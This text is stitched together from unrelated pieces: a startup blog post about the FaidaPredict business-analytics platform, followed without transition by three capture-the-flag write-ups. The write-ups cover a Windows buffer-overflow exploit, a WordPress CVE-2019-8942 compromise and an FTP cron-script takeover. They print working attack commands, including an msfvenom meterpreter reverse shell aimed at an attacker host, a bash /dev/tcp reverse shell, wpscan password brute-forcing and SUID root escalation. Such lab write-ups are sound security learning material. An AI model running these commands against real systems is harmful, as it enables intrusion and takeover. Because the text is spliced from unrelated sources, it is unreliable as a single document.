1. Introduction: The Journey Begins

Prior to founding Plentier Systems, we its core team have spent years working across various ERP system intergrations. In every project, a common theme emerged: SMEs were flying blindly. Reporting toools existed, but they lacked depth. At best, they presented static historic data. At worst, they overwhelmed users with complexity and noise.

Some platforms offered flexible report builders. But very few delivered predictive Insights, the kind that could help a business owner anticipate trends, optimize operations, or make informed decisions in real time.

That limitation sparked an idea.

In 2024, One of our co-founders introduced to us Kelvin, who would later become part of the founding team. He came with a clear, compolling vision.

“Lets democratize business intelligence and data analysis. Lets bring AI powered insights to SMEs”

That conversation marked the beginning of FaidaPredict our commitment to make powerful, predictive insights accessible to everyday businesses. After months of brainstorming, prototyping, and validating our assumptions with real users and transactions data, we have reached our first milstone:

On June 14th, 2025 we launched the MVP of FaidaPredict.

But this was never just about launching a product. It was about building a platform that helps SMEs move from hindsight to insight without needing a data science team or a massive IT budget.

2. Where We Are: Present Day FaidaPredict

Today, FaidaPredict is moving from idea to impact.

We have built a working platform tha gives SMEs, Lenders, and SACCOs the power to make informed, data driven decisions without needing a full tech or data analysis team.

a. Seamless Data Integration

We have made it simple for businessesto bring their data into FaidaPredict through a variety of common formats and systems.

• Excel Uploads
• Quickbooks, Odoo, ERPNext, and TallyPrime exports
• MySQLand PostgreSQL live database connections
• TallyPrime server intergration: just enable TallyPrime as a server and FaidaPredict can fetch your data automatically in real-time.

b. Predictive Intelligence For Everyday Business

Once your data is on FaidaPredict, you can utilize powerful AI models that provide actionable insights such as:

• Sales Forecasting
• Customer Lifetime Value Prediction
• Customer Churn Prediction
• Supplier Lifetime Value and Churn Prediction
• Transaction Fraud Risk Detection

We have enabled support for both classification and regression algorithms, giving users freedom to choose what works best for them based on accuracy and use case.

c. Tools for Advanced Users

For advanced users and analysts, FaidaPredict includes:

• A built-in SQL Editor
• Remote SQL and Postgres data connection
• The ability to query either your company’s own database or the secure database provisioned by FaidaPredict

This flexibilty makes it easier for growing teams to scale their data workflows without being locked into grid dashboards.

d. Challenges We are Navigating

We are proud of the progress so far but as a small and dedicated team we face challenges:

• Balancing feature development and bug fixes with limited resource.
• High demand for a desktop version FaidaPredict, as many users prefer to keep their data stored locally. (We are actively working on this to keep things fast, secure, and user friendly).

3. Where We are Going: The Road Ahead

As we solidify the foundation of FaidaPredict, our next big focus is growth.

a. Marketing and Awareness

We have validated the need. we have built the MVP. Now, it is time to reach the businesses that need us most.

Our immediate priority is to ramp up marketting efforts rising awareness amoung SMEs, SACCOs and Lenders who can benefit from FaidaPredict’s intelligence. We want to show them that AI powered insights are not just for the enterprise elites they are for everyone.

b. Smarter Tools for Smatter Decisions

While refining our current feature set, we are also building the next wave of innovations

• AI agents to generate SQL queries — Users will be able to ask questions in plain english and instantly receive queries they can run or modify no advanced skills needed.
• Dimensions and Metrics Dashboards — We are developing tools to automatically convert SQL queries into sharable dashboards, giving analysts and decision makers a visual way to communicate.

FaidaPredict is still early in its journey, but the mission is clear: Empower SMEs with intelligent, predictive tools that help them grow, compete and thrive.

Join US

Lets shape the future of business intelligence together.

Visit us at https://www.faidapredict.com or reach out to explore how you can be part of the journey.

In this article, I am going to demonstrate exploiting a windows machine by exploiting buffer overflow through using custom exploitation. I will be working with both a Linux and a Windows workstation.

Enumeration

Enumeration is essential in any penetration testing activity. I started by scanning all the ports on the machine to see the open ones. First, I will export the IP address of the host so that it can be in a variable for easy access (It can be accessed using the dollar symbol “$” followed by the variable name).

export ip=10.10.94.250

nmap -v $ip -oN ports.txt (“-v for verbose and -oN to save in a file”)

The machine has five open ports but I still don’t know the version of the services running on those ports. So I did more enumeration on the open ports to see the service and the versions they are running “-sC for all the default scripts and -sV for service enumeration.”

nmap -sC -sV -T4 -v -p135,139,445,3389,31337 $ip -oN scan.txt

Let’s enumerate port 339 and port 445 that are mostly used by SMB. I used smbclient to enumerate the shares in the host.

smbclient -L \\\\$ip (Lists the shares on the host)

From my experience enumerating SMB shares the ADMIN$, C$, and IPC$ mostly require authentication to access. So I started with the Users’ share, which did not require any authentication. I was able to download a Windows executable under the Shares folder in the Users share.

smbclient \\\\$ip\Users

Since this is a buffer overflow machine I was not expecting to get any information on port 135 (RPC) and port 3389 (RDP), so I ignored them while enumerating port 31337 using telnet.

telnet $ip 31337

From the result, we can see that when I type a string it returned a string followed by the string I typed. Upon further enumeration, I noticed that the windows executable (gatekeeeper.exe) works the same as the service on port 31337.

Buffer Overflow Enumeration

I started by running gatekeeper.exe on my windows machine, and it was just listening for connections. Meaning I have to make a connection to it using sockets. I used python to make the socket connection.

Python script to make the connection and send some data to gatekeeper.exe. I sent my name (ray3du) to the windows executable, and it returned the string “hello ray3du” meaning my connectivity to the program worked.

Now to test for Buffer Overflow I sent a bunch of A’s starting with 50 A’s and gradually increasing the number of A’s until the program crashed. The program crashed after sending 150 A’s to it.

When the program crashed it meant that I had successfully overwritten the EIP (extended instruction pointer). The EIP points the next instruction to be executed by the program. This means that if we manage to change the EIP to point to a reverse shell I might be able to exploit the machine.

Finding Offset

I used Metasploit’s pattern-create modules to produce bytes based on the number of A’s that crashed the program.

msf-pattern_create -l 150

The reason why this is necessary is that 150 is not the exact point where the EIP was overwritten, so we have to find the exact point. Now I modified my python testing script and replaced the A’s with the bytes produced my pattern_create.

Before running the python script open immunity debugger as an administrator, attach gatekeeper.exe, and press play. This will enable you to read the value of EIP when the program crashes.

After running the script I was able to obtain the value of EIP (39654138) which we will use to obtain the exact point the EIP was overwritten using Metasploit’s pattern_offset module.

msf-pattern_offset -l 150 -q 39654138 (-l for the data length and -q for the EIP value)

The exact match was found meaning that anything beyond 146 will overwrite the EIP. So if I send 146 A’s and 4 B’s the EIP is supposed to have the hex value of the 4 B’s which is 42424242. Lets try to see if this is true.

From the result you can see that the EIP is reading 42424242 which is the hex code for the four B’s. Meaning that I have successfully overwritten EIP.

Finding Bad Characters

Here we are trying to find all the hexadecimal characters that we can use in our exploit without being rejected by the program. To do this I modified the python script by adding all hexadecimal characters to the data sent. Before running the script open immunity debugger and attach gatekeeper.exe.

To view, the bad characters right-click on ESP (extended stack pointer) and click on flow in the dump. I manually double-checked from the last 42 (B’s) to the last hex character if they are following each other in a sequential manner. I used the bad characters and the hex dump to compare them.

From the result, I found out that “\x0a” was a bad character as it was being replaced in the hex dump by “\x00”. And also by default “\x00” (null character) is a bad character. So I had two bad characters \x00 and \x0a. We will exclude the bad characters when producing the reverse shell.
Now that we have control of the EIP (instruction pointer) we will use !mona to find the JMP ESP. JMP command is an assembly language mnemonics that is used to perform an unconditional jump. So we will use it to jump to the ESP.

!mona jmp -r esp

The characters were small to view, but it located pointers with jmp esp and we will use the one that is highlighted in blue. We will use the leftmost value in white which was “080414C3”.

Generating the shell code

I used mfvenom to generate a meterpreter shell. (“-b excludes the hex code passed as a string”).

msfvenom -p windows/meterpreter/reverse_tcp EXITFUNC=thread -b “\x00\x0a” -f c LHOST=10.8.83.250 LPORT=8001

The next phase was to modify the python script to include the malicious reverse shell that I have generated. I used the 146 A’s and added “\xc3\x14\x04\x08” which is 080414C3 in reverse and holds the jmp esp pointer. Also the data I added “\x90” to add some padding. And I finally added the shellcode generated using msfvenom.

Before running the script start Metasploit and load the handler module to start a listener.

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

run

Remember to set the listening port as the one you used to generate the reverse shell with msfvenom.
After running the script I got a shell back.

And we have successfully exploited the host via buffer overflow. Thank you for reading.

References

1. https://tcm-sec.com/2019/05/25/buffer-overflows-made-easy/
2. https://medium.com/@sghosh2402/understanding-exploiting-stack-based-buffer-overflows-acf9b8659cba
3. https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/

WordPress is an open-source CMS (content management system) used for creating blogs and websites. We are going to test Blog a tryhackme machine (https://tryhackme.com/) to learn hacking version 5.0 of WordPress using CVE 2019–8942.

Enumeration

Enumeration is essential in getting as much information about the host, which enables easy exploitation.

Start nmap to map out the open ports on the host so that we can take advantage of services running on those ports that are not configured correctly.

nmap -v blog.thm -oN ports.txt (“-v” for verbose and “-oN” to save the results)

The host has four open ports 22, 80, 139, and 445. Start another nmap scan to enumerate the services and version using nmap scripts. These will give us a better understanding of the services running on the host.

nmap -sC -sV -p22,80,139,445 -oN service.txt

The results immediately show that there is a robots.txt file with one disallowed entry, which seems to be a WordPress directory. Since port 80 is hosting a WordPress blog, we will use wpscan to enumerate it further.

wpscan — url blog.thm — enumerate (“ — enumerate” is for enumerating users on the blog”)

The results show that there are two users registered on the blog. I tried to brute-forcing both of the users using wpscan, but only one succeeded.

wpscan — url blog.thm — usernames kwheel — passwords rockyou.txt

I navigated to the blog to make sure that the result worked for the user. I was able to login to the dashboard successfully.

Exploitation

From the dashboard and also from previous wpscan scans on the blog, I was able to view the WordPress version. Knowing the WordPress version being utilized is essential in searching the right exploit. I was able to find a Metasploit module on rapid7 for CVE 2019–8942, which is an exploit for the WordPress version being used in this case.

The module worked on my first try, and I got a meterpreter shell back. Meterpreter shells are powerful but in this case, I chose to use the Linux shell terminal.

shell

python -c “import pty; pty.spawn(‘/bin/bash’)”

export TERM=xterm

Privilege Escalation

At this point, I ran linpeas.sh, which made me enumerate the MySQL database. The database contained some credentials, I tried to crack them, but it was all in vain it turned out to be a rabbit hole. So I decided to check for programs that run root as the owner, not the user who started it.

find / -perm -u=s 2>/dev/null

The results had a program checker which, after checking on gtfobins I saw that it is a third party program probably created by the user. We will use ltrace which is a debugging tool that records and intercepts dynamic calls made to shared libraries.

ltrace checker

The result showed that the program tried to access the admin variable which, is initially set to nill. So let’s try setting the admin variable to 1 using export.

export admin=1

After running checker the uid was changed to root, and we got root privileges.

And we got root! I hope you enjoyed it. Thank you for reading.

One of my favorite things to do in my spare time is playing CTF’s (capture the flag) on tryhackme (https://tryhackme.com/ ). Today I tried the anonymous machine which is a Linux box with an interesting attack vector. Let’s get started!

Enumeration

I like storing the IP address in a variable for easy reference and access when using it.

export ip=10.10.114.44

I typically fire off nmap to map out the open ports on the machine using;

nmap -v $ip -oN scans.txt

From the results there are four ports open and one filtered, we will concentrate on the open ports. let’s start with port 21 which is running FTP to see if we can access any files that are meant to be private. I tried login in to the FTP server anonymously using anonymous as the username and password and I had access to the FTP server.

As I suspected the ftp server has one folder scripts which can be viewed using the “ls” command. I used the “cd” command to enter into the folder which contains three files clean.sh, removed_files.log, and to_do.txt. To download the all the three files into your local machine use the “mget *” command.

Exploitation

Clean.sh file immediately captured my attention because it had the execute permission. My immediate thought was that the file might be running as a cronjob by the machine. I tested to see if the machine allowed anonymous upload of files through the FTP server, and to my surprise, it worked. So let’s modify the contents of clean.sh and add a reverse shell to connect back to our listener.

clean.sh (modified file content)

bash -c “bash -i >& /dev/tcp/“your ip”/8001 0>&1”

Before uploading the file to the FTP start a Netcat listener on port 8001 or the port number you used.

nc -lnvp 8001

Uploading the malicious file to the ftp server

Immediately after uploading the file to the FTP server I got a shell back on my Netcat listener.

Maintaining Access

Stabilizing the shell is important as you do not want to lose your shell when you accidentally click CTRL-C. First let’s change to a more stable shell using python.

python -c “import pty; pty.spawn(‘/bin/bash’)”

Now press CTRL-Z to run the shell in the background so that you can be able to set the terminal print using stty. TERM variable enables the clearing of the Linux terminal using the shell.

stty raw -echo;fg

stty -raw echo

export TERM=xterm

Privilege Escalation

Privilege escalation is my favorite part cause you have the initial foothold and a popped shell already. First, locate linpeas.sh in your machine then upload it to the anonymous machine. Immediately after running, it lit up after detecting env has a SUID bit set. Which we may use to escalate our privilege in the machine.

This took me to gtfobins to check if there is an exploit for it. And I found a one-liner that spawns a shell with the euid set to root.

env /bin/sh -p

And we are done and hope you enjoyed it.